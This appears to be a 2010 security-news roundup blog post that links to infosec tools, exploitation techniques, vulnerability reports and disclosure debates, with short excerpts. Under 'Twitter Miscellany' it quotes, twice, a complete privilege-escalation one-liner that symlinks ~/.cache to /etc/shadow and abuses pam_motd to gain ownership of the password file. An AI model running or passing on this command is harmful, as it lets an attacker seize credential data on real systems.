Resources:
- Welcome to Issue 003 of the HITB Magazine! – hitb.org
In conjunction with our first European event, we have lined up an interview with Dutch master lock picker and founder of The Open Organization of Lock Pickers (TOOOL) Barry Wels. - Various Presentations During HITB Amsterdam 2010 – hitb.org
- People Searches – sans.org
During a computer exam for an employee threats case, we found activity on Facebook, Twitter, and two different webmail accounts.
Tools:
- REMnux: A Linux Distribution For Reverse-Engineering Malware – darknet.org.uk
REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software.
Techniques:
- Pwning PHP for fun and chocapicz – nibbles.tuxfamily.org
Today, i’m going to talk about the latest PHP vulnerability discovered by Stefan Esser and published on the 25 of June. - Quickpost: Preventing the /Launch Action “cmd.exe” Bypass – didierstevens.com
Adobe has released a new Adobe Reader version that contains functionality to block my /Launch action PoC, but Bkis found a bypass. - Exposing HMS HICP Protocol + 0Day ‘light’ + SCADA_SHODAN – reversemode.com
Today we are going to reverse a simple M2M propietary protocol developed by the Swedish company HMS. - Episode #103: Size Might Matter… But Timing is Everything – commandlinekungfu.com
A recursive directory listing, which includes system and hidden files by using the -Force option, is filtered based on the last access time. - Twitter Miscellany
- rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow) #tweetsploits
– jonoberheide
- rm -rf ~/.cache; ln -s /etc/shadow ~/.cache; ssh localhost (trigger pam_motd by re-logging in and you’ll own /etc/shadow) #tweetsploits
- Intro to RailGun: WIN API for Meterpreter – room362.com
Basically what this allows you to do is make Windows API calls from Meterpreter without compiling your own DLL. - How to Own a Database With SQL Injection – threatpost.com
Two common variations of the SQL Injection exist. Both are code injection techniques that exploit security vulnerabilities. - OSX ROP Exploit – EvoCam Case Study – exploit-db.com
The technique used in that tutorial only worked on the previous incarnation of Apple’s OS X operating system known as Leopard (10.5.x). - Index of /ciphers/skype – cryptolib.com
Nothing to see here, just the security ciphers for Skype’s proprietary. - Beyond Fuzzy Hashing – jessekornblum.com
Computers are fantastic at finding identical pieces of data, but terrible at finding similar data. Part of the problem is first defining the term “similar” in any given context. - Updated Web Application Security Testing Collection for Firefox – adammuntner.blogspot.com
This is an advanced method useful for those who want to redistribute the file, such as administrators. - Metasploit Basics – Part 2: Payload – digitalbond.com
In this installment of Metasploit Basics I will discuss the payload modules included in Metasploit. - Wildly successful social engineering – uncommonsensesecurity.com
I am not talking about the “Robin Sage” social media/social engineering case where a lot of people who should know better gave up a lot of information in a lot of different ways. - Launching Web Application Security Scans From The Command Line – websecurify.com
Starting with Websecurify 0.6, you can launch the web application security scanner from the command line. - Hacking FaceTime
A look into the data streamed by the iPhone 4’s new video conference feature.- Special Look: Face Time (part 1: Introduction) – packetstan.com
- Special Look: Face Time (part 2: SIP and Data Streams) – packetstan.com
- Special Look: Face Time (part 3: Call Connection Initialization) – packetstan.com
- Detecting Mobile Browsers – marcoramilli.blogspot.com
This web site does not only recognize if a mobile phone is surfing on it but it provides a great set of open source scripts to detect them.
Vulnerabilities:
- YouTube Hit By HTML Injection Vulnerability – slashdot.org
The bug is triggered by placing a <script> tag at the beginning of a post. The tag itself is escaped, but everything following it is cheerfully placed in the page as is. - Hacker Creates Plugin That Trashes Chrome’s Security – thenextweb.com
Before we proceed, know that this exploit is out in the open, be extra careful when you install any Chrome plugin; you may be at risk.
Other News:
- App Store, Hacked. (Updated: iTunes Accounts too.) – thenextweb.com
Two iPhone App developers have spotted what appears to be a hacking of the App store rankings by a rogue developer. - Researcher given a shake down; vendors using law to stop public disclosure of flaws.
ATM vendors weren’t too happy about that fact and employed legal means to prevent Chiesa from addressing the conference crowd.- ATM vendors threaten researcher, stop his presentation on ATM flaws – net-security.org
- Security expert once more threatened with arrest for giving talk – h-online.com
- On flip side, Researchers retaliate to unfair treatment of another of their kin
The researchers openly stated that they will continue to do so in response to how Microsoft treated Tavis Ormany, the Google engineer blamed for disclosing a critical Windows bug publicly last month.- Upset Security Researchers Start Releasing Microsoft 0Days – softpedia.com
- Angry researchers disclose Windows zero-day bug – computerworld.com
- Microsoft vulnerabilities: full disclosure and no disclosure – h-online.com
- Big W infecting photo printing customers? – risky.biz
The Windows-based Fuji photo kiosks located in the company’s stores apparently don’t run antivirus software. - Cisco warns attendees that the Cisco Live database was hacked – networkworld.com
In the email that Cisco sent me it says that the security offer’s ” team completed a thorough review and as a result we believe your registration information. - U.S. Plans Cyber Shield for Utilities, Companies – wsj.com
The federal government is launching an expansive program dubbed “Perfect Citizen” to detect cyber assaults on private companies and government agencies running such critical infrastructure as the electricity grid and nuclear-power plants, according to people familiar with the program. - Crack the Code in Cyber Command’s Logo (Updated) – wired.com
Its mission is largely opaque, even inside the armed forces. But the there’s another mystery surrounding the emerging unit. It’s embedded in the Cyber Command logo. - Credit Card Hackers Visit Hotels All Too Often – nytimes.com
A study released this year by SpiderLabs, a part of the data-security consulting company Trustwave, found that 38 percent of the credit card hacking cases last year involved the hotel industry. - Hi! I’m a security researcher, and here’s your invoice – zdnet.com
It always struck me as a simple deal: there are benefits to openly participating in the security research community – peer recognition and job opportunities.
[…] This post was mentioned on Twitter by sophto_92, cantormath. cantormath said: Infosec Events: Week 27 in Review – 2010 http://bit.ly/b3K9lb […]
Advanced SQL Code Collection…
I found your entry interesting do I’ve added a Trackback to it on my weblog :)…